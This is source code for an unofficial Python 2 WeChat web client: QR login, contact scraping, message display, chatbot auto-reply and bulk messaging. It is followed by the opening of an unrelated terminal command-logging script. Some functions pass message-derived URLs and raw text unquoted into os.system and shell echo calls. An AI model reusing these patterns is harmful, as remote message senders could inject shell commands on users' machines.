'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
self.TimeOut = 20 # 同步最短时间间隔(单位:秒)
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
if data == '':
return False
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
def genQRCode(self):
#return self._showQRCodeImg()
if sys.platform.startswith('win'):
self._showQRCodeImg()
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
if data == '':
return
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
os.startfile(QRCODE_PATH)
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
if data == '':
return False
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
if data == '':
return False
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
if dic == '':
return False
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
if dic == '':
return False
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
if dic == '':
return False
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
if Contact['VerifyFlag'] & 8 != 0: # 公众号/服务号
ContactList.remove(Contact)
self.PublicUsersList.append(Contact)
elif Contact['UserName'] in SpecialUsers: # 特殊账号
ContactList.remove(Contact)
self.SpecialUsersList.append(Contact)
elif Contact['UserName'].find('@@') != -1: # 群聊
ContactList.remove(Contact)
self.GroupList.append(Contact)
elif Contact['UserName'] == self.User['UserName']: # 自己
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
if dic == '':
return False
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
if dic == '':
return None
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'webpush.weixin.qq.com',
#'webpush2.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush1.wechatapp.com',
'webpush.wechatapp.com',
'webpush.wx.qq.com',
'webpush.wx2.qq.com',
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
if data == '':
return [-1,-1]
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if dic == '':
return None
if self.DEBUG:
print json.dumps(dic, indent=4)
(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
# 计数器
self.media_count = self.media_count + 1
# 文件名
file_name = image_name
# MIME格式
# mime_type = application/pdf, image/jpeg, image/png, etc.
mime_type = mimetypes.guess_type(image_name, strict=False)[0]
# 微信识别的文档格式,微信服务器应该只支持两种类型的格式。pic和doc
# pic格式,直接显示。doc格式则显示为文件。
media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
# 上一次修改日期
lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
# 文件大小
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
# Not work now for weixin haven't support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
if data == '':
return ''
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
# 现有群里面查不到
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
return self.User['NickName'] # 自己
if id[:2] == '@@':
# 群
name = self.getGroupName(id)
else:
# 特殊账号
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 公众号或服务号
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 直接联系人
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 群友
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content)
if data == '':
return
data.decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
temp = self._get(content)
if temp == '':
return
tree = html.fromstring(temp)
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if re.search(":<br/>", content, re.IGNORECASE):
[people, content] = content.split(':<br/>')
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
content = msg['Content'].replace('<', '<').replace('>', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = self._xiaodoubi(content) + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print '%s 发送了一张名片:' % name
print '========================='
print '= 昵称: %s' % info['NickName']
print '= 微信号: %s' % info['Alias']
print '= 地区: %s %s' % (info['Province'], info['City'])
print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
print '========================='
raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
name.strip(), json.dumps(info))}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
self._showMsg(raw_msg)
self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
print '========================='
print '= 标题: %s' % msg['FileName']
print '= 描述: %s' % self._searchContent('des', content, 'xml')
print '= 链接: %s' % msg['Url']
print '= 来自: %s' % self._searchContent('appname', content, 'xml')
print '========================='
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
name, appMsgType[msg['AppMsgType']], json.dumps(card))}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
if sys.platform.startswith('win'):
import thread
thread.start_new_thread(self.listenMsgMode())
else:
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print '发送表情'
[name, file_name] = text[3:].split(':')
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
print(str)
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
qr.make()
# img = qr.make_image()
# img.save("qrcode.png")
#mat = qr.get_matrix()
#self._printQR(mat) # qr.print_tty() or qr.print_ascii()
qr.print_ascii(invert=True)
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
try:
response = urllib2.urlopen(request)
data = response.read()
logging.debug(url)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
try:
response = urllib2.urlopen(request)
data = response.read()
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
if not sys.platform.startswith('win'):
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
s-cli.py
|
#!/usr/bin/python3
import getpass
import sys
import os
import subprocess
from time import gmtime, strftime, localtime
import re
import pexpect, struct, fcntl, termios, signal
import string
import subprocess
#import sh
#from multiprocessing import Process
u = subprocess.getstatusoutput('whoami')[1]
sd = subprocess.getstatusoutput('echo ~')
sd = sd[1]
t = strftime("%d-%m-%Y_%H-%M-%S", localtime())
f = open('%s/.sabre/%s-sabre.log' % (sd, t), 'w')
f = open('%s/.sabre/%s-sabre.log' % (sd, t), 'a')
c = []
o = []
pmt = ''
setPrompt=''
logme = ''
init = True
def sigwinch_passthrough (sig, data):
s = struct.pack("HHHH", 0, 0, 0, 0)
a = struct.unpack('hhhh', fcntl.ioctl(sys.stdout.fileno(),
termios.TIOCGWINSZ , s))
def escape_ansi(line):
ansi_escape = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
line1 = ansi_escape.sub('', line)
line2 = line1.replace('^[(B', '')
return line2
def escape_vt100(line):
line1 = subprocess.getstatusoutput('echo "%s" | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g"' % line)[1]
return line1
def userCmdLog(cmd):
global pmt
global init
global logme
global setPrompt
ti = strftime("%d-%m-%Y %H:%M:%S", localtime())
if cmd == '\r':
cm = ''.join(c)
c[:] = []
if setPrompt == 'session_':
pmt = setPrompt+cm+':'
setPrompt = ''
if cm == 'sessions' or cm == 'ses' or cm == 'sess' or cm == 'sessi' or cm == 'sessio' or cm == 'session':
setPrompt = 'session_'
